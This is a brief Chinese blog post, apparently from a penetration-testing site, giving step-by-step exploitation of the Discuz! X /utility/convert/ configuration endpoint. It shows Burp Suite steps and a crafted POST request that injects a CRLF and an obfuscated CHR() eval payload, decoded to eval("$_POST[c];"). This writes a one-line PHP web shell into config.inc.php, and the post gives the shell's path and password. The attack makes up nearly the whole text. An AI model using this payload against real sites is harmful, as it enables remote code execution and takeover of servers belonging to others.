Discuz-X漏洞利用

释放双眼,带上耳机,听听看~!

注入漏洞的地方:

http://192.168.1.63/utility/convert/

回到 burpsuite 開啓攔截 然後 web 界面點擊任意版本的開始選單

Burp的repeater修改第一行

GET /utility/convert/index.php?a=config&source=d7.2_x2.0 HTTP/1.1

POST
/utility/convert/index.php?a=config&source=d7.2_x2.0&newconfig[aaa%0a%0deval(CHR( 101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(36).CHR(95).CHR(80).CHR(79).CH R(83).CHR(84).CHR(91).CHR(99).CHR(93).CHR(59).CHR(34).CHR(41).CHR(59));//]=aaaa&su bmit=yes HTTP/1.1




解密後爲:

POST /utility/convert/index.php?a=config&source=d7.2_x2.0&newconfig[aaa%0a%0d
 eval("$_POST[c];");//]=aaaa&submit=yes




路徑:

http://192.168.1.63/utility/convert/data/config.inc.php

密碼  c

质量好文

RCTF2020 roiscoin

2020-6-7 14:17:27

渗透教程漏洞系统安全质量好文

CVE-­2020­-0796(SMBGhost)漏洞利用

2020-6-7 18:08:56

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
有新私信 私信列表
搜索